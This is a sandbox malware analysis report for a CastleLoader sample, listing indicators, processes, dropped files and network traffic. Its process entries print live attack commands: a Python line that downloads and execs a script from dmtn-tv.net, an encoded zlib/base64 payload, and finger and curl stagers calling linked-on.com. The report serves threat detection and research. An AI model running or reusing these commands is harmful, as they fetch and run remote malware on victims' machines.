File name:

dummy.txt

Full analysis: https://app.any.run/tasks/d8acce2c-4fd8-45d4-96c3-64c1fd77e094
Verdict: Malicious activity
Threats:

CastleLoader is a modern malware loader designed to quietly establish initial access and deliver follow-up payloads such as stealers, RATs, and ransomware. It focuses on stealth, flexibility, and rapid payload rotation, making it an effective tool for financially motivated threat actors and a persistent problem for enterprise defenders.

Malware Trends Tracker     >>>
Analysis date: April 17, 2026, 13:45:06
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
python
arch-exec
arch-doc
castleloader
loader
websocket
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

275876E34CF609DB118F3D84B799A790

SHA1:

829C3804401B0727F70F73D4415E162400CBE57B

SHA256:

B5A2C96250612366EA272FFAC6D9744AAF4B45AACD96AA7CFCB931EE3B558259

SSDEEP:

3:5n:5n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • CASTLELOADER has been detected (YARA)

      • 15272682927448.exe (PID: 2204)

    • Create files in the Startup directory

      • 15272682927448.exe (PID: 2204)

    • CASTLELOADER mutex has been found

      • pythonw.exe (PID: 5452)
      • pythonw.exe (PID: 5520)

  • SUSPICIOUS

    • Starts CMD.EXE and keeps the shell open after execution

      • cmd.exe (PID: 7260)
      • cmd.exe (PID: 7448)

    • Process drops python dynamic module

      • tar.exe (PID: 5228)
      • 15272682927448.exe (PID: 2204)

    • The process drops C-runtime libraries

      • tar.exe (PID: 5228)
      • curl.exe (PID: 7604)
      • 15272682927448.exe (PID: 2204)

    • Executable content was dropped or overwritten

      • tar.exe (PID: 5228)
      • cmd.exe (PID: 7448)
      • 15272682927448.exe (PID: 2204)

    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 7448)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2960)

    • Starts Curl with silent output flags

      • curl.exe (PID: 7604)

    • Application launched itself

      • 15272682927448.exe (PID: 2016)
      • pythonw.exe (PID: 5452)

    • The executable file from the user directory is run by the CMD process

      • 15272682927448.exe (PID: 2016)

    • Loads Python modules

      • 15272682927448.exe (PID: 2016)
      • 15272682927448.exe (PID: 2204)
      • pythonw.exe (PID: 5452)
      • pythonw.exe (PID: 5520)

    • The process executes files with name similar to system file names

      • cmd.exe (PID: 7448)

    • Reads the date of Windows installation

      • StartMenuExperienceHost.exe (PID: 2728)
      • SearchApp.exe (PID: 7352)

  • INFO

    • FOR cycle in command line

      • cmd.exe (PID: 7448)
      • cmd.exe (PID: 7260)

    • Application launched itself

      • cmd.exe (PID: 7260)
      • cmd.exe (PID: 7448)

    • Checks supported languages

      • tar.exe (PID: 5228)
      • curl.exe (PID: 7604)
      • curl.exe (PID: 4300)
      • 15272682927448.exe (PID: 2016)
      • 15272682927448.exe (PID: 2204)
      • TextInputHost.exe (PID: 7544)
      • StartMenuExperienceHost.exe (PID: 2728)
      • SearchApp.exe (PID: 7352)
      • pythonw.exe (PID: 5452)
      • pythonw.exe (PID: 5520)

    • Creates files or folders in the user directory

      • tar.exe (PID: 5228)
      • curl.exe (PID: 7604)
      • explorer.exe (PID: 1176)
      • 15272682927448.exe (PID: 2204)

    • Execution of CURL command

      • cmd.exe (PID: 7448)

    • Reads the computer name

      • curl.exe (PID: 7604)
      • 15272682927448.exe (PID: 2204)
      • TextInputHost.exe (PID: 7544)
      • curl.exe (PID: 4300)
      • StartMenuExperienceHost.exe (PID: 2728)
      • SearchApp.exe (PID: 7352)
      • pythonw.exe (PID: 5520)

    • The sample compiled with english language support

      • curl.exe (PID: 7604)
      • tar.exe (PID: 5228)
      • 15272682927448.exe (PID: 2204)

    • Python executable

      • 15272682927448.exe (PID: 2016)
      • 15272682927448.exe (PID: 2204)
      • pythonw.exe (PID: 5452)
      • pythonw.exe (PID: 5520)

    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 1176)
      • StartMenuExperienceHost.exe (PID: 2728)
      • 15272682927448.exe (PID: 2204)

    • Process checks computer location settings

      • StartMenuExperienceHost.exe (PID: 2728)
      • SearchApp.exe (PID: 7352)
      • 15272682927448.exe (PID: 2204)

    • Reads the machine GUID from the registry

      • SearchApp.exe (PID: 7352)
      • 15272682927448.exe (PID: 2204)
      • pythonw.exe (PID: 5452)
      • pythonw.exe (PID: 5520)

    • Reads Environment values

      • SearchApp.exe (PID: 7352)
      • pythonw.exe (PID: 5520)

    • Launching a file from the Startup directory

      • 15272682927448.exe (PID: 2204)

    • Reads product name

      • pythonw.exe (PID: 5520)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
157
Monitored processes
20
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs finger.exe taskkill.exe no specs curl.exe tar.exe 15272682927448.exe no specs #CASTLELOADER 15272682927448.exe conhost.exe no specs curl.exe explorer.exe no specs startmenuexperiencehost.exe no specs textinputhost.exe no specs searchapp.exe mobsync.exe no specs #CASTLELOADER pythonw.exe no specs #CASTLELOADER pythonw.exe

Process information

PID
CMD
Path
Indicators
Parent process
1176explorer.exe C:\Windows\explorer.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shcore.dll
2016"C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\15272682927448.exe" -c "import sys,subprocess as s,base64 as b,zlib as z;s.Popen([sys.executable,'-c',z.decompress(b.b64decode('eJydk8tKAzEYhbMWfAfBheOi47S11RF8AEHERaFL6SWDhd7sJNXH9wS/YAiKg4uPZPJfcnKSOTfGvIuROIgHcSOm4lk8iUfxJuZiIk7FiViJjdiLHfVOnIkW1h3zXRK3HWs832tYobFk3aLbM2+pjb1TjaHmRSyS2hn5ltiSeUPMU+uIvzJ36G2TnkH7Nun3kZzj/gfPuujx9DyydsCDhtGi+S8N0Y9Fpue//pZZ7Q4/LPsX4uIXv+7EFQTtG+Khrsf8yB5bejrya/P1jvtiIMZ4ZtEd6q+TeMXaiNw5sbB2ix819T1yhvi7ZKzIq6gfs16jqU3ucMi5LzMPZ/Qrklh8a/He4nf0znPuJtEbe8f7zP+p0ny/Lwt7eg6I97Me8Z1ELQVjyPkEeJZbCg==')).decode('utf-32')],creationflags=s.CREATE_NO_WINDOW)" C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\15272682927448.execmd.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
MEDIUM
Description:
Python
Exit code:
0
Version:
3.15.0a1
Modules
Images
c:\users\admin\appdata\local\python-3.15.0a1-embed-win32\15272682927448.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\users\admin\appdata\local\python-3.15.0a1-embed-win32\vcruntime140.dll
2204C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\15272682927448.exe -c "#w5rI7WPNLqbT import ssl import time import urllib.request ssl._create_default_https_context = ssl._create_unverified_context c = urllib.request.urlopen('https://dmtn-tv.net/95126aeb-4120-56b1-8c9e-63fdf0c0b6f9/scr3').read().decode('utf-8') time.sleep(2.1) exec(c)"C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\15272682927448.exe
15272682927448.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
MEDIUM
Description:
Python
Exit code:
0
Version:
3.15.0a1
Modules
Images
c:\users\admin\appdata\local\python-3.15.0a1-embed-win32\15272682927448.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\users\admin\appdata\local\python-3.15.0a1-embed-win32\vcruntime140.dll
2524taskkill /f /im explorer.exe C:\Windows\System32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2652finger LoIjneLiUv@finger.linked-on.comC:\Windows\System32\finger.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCPIP Finger Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\finger.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\sechost.dll
2728"C:\WINDOWS\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mcaC:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exesvchost.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\windows\systemapps\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\startmenuexperiencehost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wincorlib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
2960C:\WINDOWS\system32\cmd.exe /c finger LoIjneLiUv@finger.linked-on.comC:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
4104\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe15272682927448.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4300curl -s -L --tlsv1.2 --ssl-no-revoke linked-on.com/leyts.php?Npier=1 C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\ucrtbase.dll
4692\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
23 290
Read events
22 933
Write events
343
Delete events
14

Modification events

(PID) Process:(1176) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e72-85a9-11eb-90a8-9a9b76358421}
Operation:writeName:Data
Value:
D60D00000DF0ADBA41000000080000000000008400000000000000300000000000000000FF06E703FF00000016000000FA99B7261F00000004400010010000000000000000000000000000000000000000005C005C003F005C00530054004F005200410047004500230056006F006C0075006D00650023007B00360039006500330033003200330066002D0039003500320034002D0031003100660030002D0062003400660035002D003800300036006500360066003600650036003900360033007D002300300030003000300030003000300030003100460035003000300030003000300023007B00350033006600350036003300300064002D0062003600620066002D0031003100640030002D0039003400660032002D003000300061003000630039003100650066006200380062007D000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005C005C003F005C0056006F006C0075006D0065007B00320066003500630035006500370032002D0038003500610039002D0031003100650062002D0039003000610038002D003900610039006200370036003300350038003400320031007D005C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004E005400460053000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000
(PID) Process:(1176) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e72-85a9-11eb-90a8-9a9b76358421}
Operation:writeName:Generation
Value:
2
(PID) Process:(1176) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e73-85a9-11eb-90a8-9a9b76358421}
Operation:writeName:Data
Value:
D60D00000DF0ADBA01000000080000000000008400000000000000300000000000000000FF06E703FF00000016000000A6CD40161E00000004000010010000000000000000000000000000000000000000005C005C003F005C00530054004F005200410047004500230056006F006C0075006D00650023007B00360039006500330033003200330066002D0039003500320034002D0031003100660030002D0062003400660035002D003800300036006500360066003600650036003900360033007D002300300030003000300030003000330046004300420038003000300030003000300023007B00350033006600350036003300300064002D0062003600620066002D0031003100640030002D0039003400660032002D003000300061003000630039003100650066006200380062007D000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005C005C003F005C0056006F006C0075006D0065007B00320066003500630035006500370033002D0038003500610039002D0031003100650062002D0039003000610038002D003900610039006200370036003300350038003400320031007D005C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004E005400460053000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000
(PID) Process:(1176) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e73-85a9-11eb-90a8-9a9b76358421}
Operation:writeName:Generation
Value:
2
(PID) Process:(1176) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{eaf65672-68c3-4f99-8d5c-104b5f4d8fff}
Operation:writeName:Data
Value:
D60D00000DF0ADBA01000000080000000000008400000000000000300000000000000000FF06E703FF000000160000009FF23EA01E00000004000010010000000000000000000000000000000000000000005C005C003F005C00530054004F005200410047004500230056006F006C0075006D00650023007B00360039006500330033003200330066002D0039003500320034002D0031003100660030002D0062003400660035002D003800300036006500360066003600650036003900360033007D002300300030003000300030003000330046004100410046003000300030003000300023007B00350033006600350036003300300064002D0062003600620066002D0031003100640030002D0039003400660032002D003000300061003000630039003100650066006200380062007D000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005C005C003F005C0056006F006C0075006D0065007B00650061006600360035003600370032002D0036003800630033002D0034006600390039002D0038006400350063002D003100300034006200350066003400640038006600660066007D005C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004E005400460053000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000
(PID) Process:(1176) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{eaf65672-68c3-4f99-8d5c-104b5f4d8fff}
Operation:writeName:Generation
Value:
2
(PID) Process:(1176) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e71-85a9-11eb-90a8-9a9b76358421}
Operation:writeName:Data
Value:
D60D00000DF0ADBA0100000008000000000000840000000000000030000000000000000006020200FF000000100000000EE13DAC1E00000004000010010000000000000000000000000000000000000000005C005C003F005C00530054004F005200410047004500230056006F006C0075006D00650023007B00360039006500330033003200330066002D0039003500320034002D0031003100660030002D0062003400660035002D003800300036006500360066003600650036003900360033007D002300300030003000300030003000300030003000300031003000300030003000300023007B00350033006600350036003300300064002D0062003600620066002D0031003100640030002D0039003400660032002D003000300061003000630039003100650066006200380062007D000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005C005C003F005C0056006F006C0075006D0065007B00320066003500630035006500370031002D0038003500610039002D0031003100650062002D0039003000610038002D003900610039006200370036003300350038003400320031007D005C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000046004100540033003200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000
(PID) Process:(1176) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e71-85a9-11eb-90a8-9a9b76358421}
Operation:writeName:Generation
Value:
2
(PID) Process:(1176) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:delete valueName:DesktopReadyTimeout
Value:
(PID) Process:(1176) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds\DSB
Operation:writeName:IsDynamicContentAvailable
Value:
1
Executable files
91
Suspicious files
23
Text files
48
Unknown types
0

Dropped files

PID
Process
Filename
Type
7604curl.exeC:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32.pdfcompressed
MD5:E38115BAF281C754710FC9DC82D85A22
SHA256:623A7CE2A9429AB87E65098775276E4F97A511D73A84AC61AC89794555E91D7B
5228tar.exeC:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\vcruntime140.dllexecutable
MD5:C33386A6E67BE415A24D9C431FFD42AC
SHA256:EB5B47CCEDDB4A45E059C1E1FCD2EFB016CB2BD9FE1FC0FD3F4C3C4CAB04153A
5228tar.exeC:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\select.pydexecutable
MD5:696674C76BFEE9C73D86F7B7BBC11F83
SHA256:3B797611AD41332BE215CF38F903E70625DA08753EEDAAC26F8C2B3CA4B6592C
5228tar.exeC:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\pyexpat.pydexecutable
MD5:3FD45F485295DD44F280E0F3E1D89FBA
SHA256:4BBD6A9BF25B5B3616FDB214A05462892CF628EE2BDF38B0DDC2C8C1223203B5
5228tar.exeC:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\unicodedata.pydexecutable
MD5:3095739C768F05A913CAE0578EE34A51
SHA256:D5F53B2183DEB73C539C6B903306116CD5D917484ACE9140A851AA36FA0395A1
5228tar.exeC:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\_bz2.pydexecutable
MD5:B1E173462284FBEB6F25EEFBC52C97B1
SHA256:84A98E00373C9A29AFF42D6176AF4DEEA267F8B168CC76C715E52ED96F85194C
5228tar.exeC:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\winsound.pydexecutable
MD5:F1D44CE05242350723EDF54C20E0337C
SHA256:17EAEA4765965FD0A20803A52C7BE9908E1320FF6AF2D1286D7FD6B488BBC26F
5228tar.exeC:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\_asyncio.pydexecutable
MD5:7B72F6CD4EE18893672DD2E48C88BCE7
SHA256:DA2AA115615A0B37C902F87E46338010C1677BE9CEA608DB04558AFBAC8B4B6A
5228tar.exeC:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\_decimal.pydexecutable
MD5:D8DF454B10FEA5BF5AD5FC6EDE54791E
SHA256:9AB8193ECCD26D0AE50805348B252EB26619AEE8766C56CAC13473B775483AF3
5228tar.exeC:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\_elementtree.pydexecutable
MD5:F205F8095AA3050AD8A300D73915E9B9
SHA256:35C582365890CC4F33A3A84BC943AD15D716FEC69DD230E077734A3AF16F1D27
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
80
TCP/UDP connections
40
DNS requests
29
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7352
SearchApp.exe
GET
304
2.16.204.153:443
https://www.bing.com/rp/ANzUnPnVY0oL0XWxs0RLJxjJLUo.br.js
NL
whitelisted
7604
curl.exe
GET
200
151.101.0.223:443
https://www.python.org/ftp/python/3.15.0/python-3.15.0a1-embed-win32.zip
US
compressed
5.00 Mb
unknown
4300
curl.exe
GET
301
188.114.96.3:80
http://linked-on.com/leyts.php?Npier=1
US
html
366 b
unknown
7352
SearchApp.exe
GET
200
23.11.40.157:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D
NL
binary
312 b
whitelisted
8140
svchost.exe
GET
200
2.16.164.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
8140
svchost.exe
GET
200
23.59.18.102:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
2204
15272682927448.exe
GET
200
104.18.21.213:80
http://e7.c.lencr.org/44.crl
US
binary
57.1 Kb
whitelisted
7352
SearchApp.exe
GET
200
204.79.197.203:80
http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D
US
binary
959 b
whitelisted
7352
SearchApp.exe
POST
204
2.16.204.153:443
https://www.bing.com/threshold/xls.aspx
NL
whitelisted
7352
SearchApp.exe
POST
204
2.16.204.153:443
https://www.bing.com/threshold/xls.aspx
NL
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
8140
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
5276
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
48.192.1.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
2652
finger.exe
107.170.45.91:79
finger.linked-on.com
DIGITALOCEAN-ASN
US
unknown
7604
curl.exe
151.101.0.223:80
www.python.org
FASTLY
US
whitelisted
7604
curl.exe
151.101.0.223:443
www.python.org
FASTLY
US
whitelisted
4300
curl.exe
188.114.96.3:80
linked-on.com
CLOUDFLARENET
US
whitelisted
4300
curl.exe
188.114.96.3:443
linked-on.com
CLOUDFLARENET
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
  • 20.73.194.208
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
google.com
  • 142.251.20.113
  • 142.251.20.138
  • 142.251.20.101
  • 142.251.20.139
  • 142.251.20.100
  • 142.251.20.102
whitelisted
finger.linked-on.com
  • 107.170.45.91
unknown
www.python.org
  • 151.101.0.223
  • 151.101.64.223
  • 151.101.128.223
  • 151.101.192.223
